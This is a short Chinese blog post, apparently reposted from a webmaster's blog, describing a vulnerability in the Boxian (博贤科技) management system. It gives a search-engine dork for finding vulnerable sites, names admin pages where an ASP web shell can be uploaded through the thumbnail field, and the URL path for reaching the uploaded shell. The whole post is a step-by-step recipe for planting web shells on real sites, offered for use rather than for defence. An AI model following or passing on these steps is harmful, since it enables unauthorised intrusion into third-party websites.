博贤科技管理系统漏洞oday

原漏洞:

搜索 inurl:cpzs.asp?ProClass=

根目录下   /manage/Product/add_news.asp

缩略图上传asp马

提交后,选择EDIT 找到那个asp的名称
构造
http://网址/UpLoadPic/Pro_Pic/上传获得的地址.asp

最新的漏洞:

搜索 inurl:cpzs.asp?ProClass=

根目录下   manage/Product/add_newsclass.asp

直接缩略图上传asp的马

提交后   

去选那个EDIT 找到那个你上穿的asp马
构造    
http://网址 /UpLoadPic/ProClass_Pic/上传获得的地址.asp

文章如转载,请注明转载自【网管小王的独立博客】:http://www.5iadmin.com/

你可能感兴趣的:(asp,根目录,manage,独立博客,的)